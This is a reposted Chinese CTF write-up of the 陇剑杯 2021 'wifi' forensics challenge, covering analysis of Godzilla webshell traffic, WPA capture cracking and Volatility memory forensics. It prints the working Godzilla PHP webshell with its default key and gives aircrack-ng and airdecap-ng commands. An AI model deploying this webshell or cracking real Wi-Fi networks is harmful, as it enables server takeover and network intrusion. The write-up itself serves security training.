您的位置:首页 > 健康 > 养生 > [陇剑杯 2021]wifi WP

[陇剑杯 2021]wifi WP

2024/10/31 21:33:28 来源:https://blog.csdn.net/m0_68483928/article/details/141172816  浏览:    关键词:[陇剑杯 2021]wifi WP

9.1小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。(压缩包里有解压密码的提示,需要额外添加花括号)

附件信息:
在这里插入图片描述

拿到附件

先看服务器.pcapng

可以发现只有发出去的包,且为哥斯拉php_eval_xor_base64流量

在这里插入图片描述

哥斯拉php_eval_xor_base64流量是3.0才更新的php连接方式,其目的是为了支持普通的一句话eval($_POST[1])。不过其本质就是利用pass参数传了一个php_xor_base64哥斯拉马罢了,所以流量特征和php_xor_base64类似。

https://www.freebuf.com/sectool/285693.html

这篇文章很好的分析了哥斯拉的特征和解密方法。

这里由于只有Request,我们的目的是获取cat /flag的内容,肯定在返回包里,所以解密Request没意义,只要记下密码pass,密钥key均为哥斯拉默认的即可。

在这里插入图片描述

J(”DMI	
ÌýÀÕ:KsPDÉC'¤
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (stripos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}
yÚyÙkº÷«®Ûv‡wŽž±¦åj÷²Æ©

$key = 3c6e0b8a9c15224a

然后我们分析客户端.cap

在这里插入图片描述

是无线局域网的流量,而且我们发现SSID为

My_Wifi

这里的SSID我们还可以使用aircrack-ng 来查看

aircrack-ng 客户端.cap

在这里插入图片描述

WPA的密码我们尝试使用airdecap-ng来爆破密码

aircrack-ng 客户端.cap -w ../../../CTF/directionary/WPA-dirc/common.txt

当然字典爆破都试过了,没有找到密码,我们想到附件中还有一个内存镜像。我们

最后分析Windows 7-dde00fa9.vmem,还是找文件

这里我们主要是找WPA的密码

vol -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep -E -i "zip|txt|rar|7z|gz|doc|png|jpg"

我们看到有用的信息就给它dump下来

最后发现My_Wifi.zip是一个加密文件

使用Windows中的压缩文件管理工具我们可以发现,下方有个提示:密码是网络适配器的GUID

在这里插入图片描述

那么什么是GUID呢?我们去网上搜索什么是GUID,Windows如何查看GUID

在Windows的注册表中的这个路径存放着GUID。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}

或者我们通过命令查看本地的GUID格式

getmac /V /S 127.0.0.1

GUID的格式通常是一串包含字母和数字的长字符,类似于**{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}**。

同样我们也可以根据这个GUID查找在注册表中的位置

这种com格式字符串很有可能在windows文件系统或者注册表中,在自己电脑上搜一下。

在这里插入图片描述

那么在内存取证工具volatility中用Interfaces关键字去定位

在这里插入图片描述

然后找到网络适配器的GUID。接着使用GUID 去解密压缩包

在这里插入图片描述

找到了无线流量的密码

然后我们使用airdecap-ng去解密无线流量

airdecap-ng 客户端.cap -p 233@114514_qwe -e My_Wifi -o 客户端_decode_.cap

在这里插入图片描述

我们接着去分析解密之后的哥斯拉流量

前后各16位的md5,中间夹着base64异或流量,典型的哥斯拉特征。和之前的服务器发起包对应起来了

在这里插入图片描述

我们跟踪到最后一个http流量包里面的内容就是flag

在这里插入图片描述

使用解密脚本,并注意删除前后混淆的16位md5值

在这里插入图片描述


版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com